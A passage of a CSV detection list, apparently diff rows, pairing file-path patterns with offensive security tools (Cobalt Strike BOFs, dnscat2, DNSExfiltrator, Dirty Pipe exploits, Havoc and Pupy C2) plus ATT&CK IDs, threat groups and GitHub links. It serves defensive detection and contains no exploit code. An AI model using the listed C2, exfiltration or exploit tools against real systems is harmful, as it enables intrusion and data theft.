- T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" +"*/Detect-Hooks/*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" +"*/DFSCoerce.git*","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","635","78","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z" +"*/dfscoerce.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - 
T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/dhcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Dialogs/Payload.hpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/dicom-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dicom-ping.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dict-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dicts/ftp_default.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/DInjector.git*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10",,"N/A",,, +"*/DInvoke/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*/DInvokeResolver/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" 
+"*/dir_brute.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/dirbuster*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/dirbuster/*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/DirCreate2System.git*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" +"*/direct_syscall_amd64.s*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" +"*/dirsearch.py*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*/Dirty-Pipe.sh*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/imfiver/CVE-2022-0847","1","1","N/A","N/A","3","257","74","2023-02-02T02:17:30Z","2022-03-07T18:36:50Z" +"*/Dirty-Pipe.sh*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","1","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" +"*/Dirty-Pipe/main/exploit-static*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" +"*/dirtypipez.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - 
TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/dirtypipez.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","1","N/A","N/A","1","41","21","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z" +"*/dirtypipez.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","1","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" +"*/dirtypipez-exploit/*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","1","N/A","N/A","1","41","21","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z" +"*/disctopia.py*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" +"*/disctopia-c2*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" +"*/DiskCryptor.git*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 
","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*/dist/fw_walk.*","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" +"*/distcc-cve2004-2687.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/distopia-test*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","0","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" +"*/dll/inject/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/dllexploit.cpp*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*/dllexploit.exe*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*/DllExport.bat*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z"
+"*/DLL-Hijack*","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","125","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z"
+"*/DllNotificationInjection.git*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z"
+"*/DllProxy.git*","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation Tools","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","1","16","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z"
+"*/dlls/c2.c*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z"
+"*/dns_grabber.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*/dns_spoof*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*/dns-blacklist.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/dns-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/dns-cache-snoop.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/dnscan.git*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z"
+"*/dnscan.py*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z"
+"*/dnscat.c*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - 
TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z"
+"*/dnscat2.git*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z"
+"*/dns-check-zone.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/dns-client-subnet-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/dnscnc.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/DNSExfiltrator*","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","8","792","189","2019-10-06T22:24:55Z","2017-12-20T13:58:09Z"
+"*/dns-fuzz.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/dns-ip6-arpa-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/dns-nsec3-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/dns-nsec-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/dns-nsid.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/DNS-Persist/*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z"
+"*/dns-random-srcport.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/dns-random-txid.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
